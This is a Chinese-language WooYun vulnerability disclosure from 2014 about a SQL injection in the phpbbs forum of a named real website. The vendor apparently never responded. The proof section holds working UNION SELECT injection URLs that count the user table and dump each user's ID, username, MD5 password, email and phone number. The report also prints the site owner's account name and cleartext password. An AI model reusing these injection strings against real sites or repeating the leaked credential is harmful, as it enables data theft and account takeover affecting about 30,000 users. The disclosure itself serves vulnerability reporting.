漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048802
漏洞标题:长城小站sql注入3万多用户信息告急
相关厂商:长城小站
漏洞作者: Wicky
提交时间:2014-01-14 11:29
修复时间:2014-02-28 11:30
公开时间:2014-02-28 11:30
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某站通过sql注入可获取三万多用户密码,邮箱以及电话(包括站长)
详细说明:
http://www.thegreatwall.com.cn/长城小站存在严重sql注入漏洞,以致3万多用户资料可能流出
漏洞证明:
www.thegreatwall.com.cn/phpbbs/index.php?forumid=-2'+and+1=2+union+select+count(userid)+from+user+--+%23+'
共有注册会员30676人
http://www.thegreatwall.com.cn/phpbbs/index.php?forumid=-2'+and+1=2+union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,email,0x3a,tel1)+from+user+--+%23+'
用户的信息都可取出,包括密码,邮箱以及手机号(密码仅进行了一次md5加密)
其中站长的账号是:火箭人 密码:zaxzax
有的邮箱密码就是账号密码,危害的扩散程度高
修复方案:
sql注入补救方法不多说了
P.S 怒求邀请码一枚
版权声明:转载请注明来源 Wicky@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝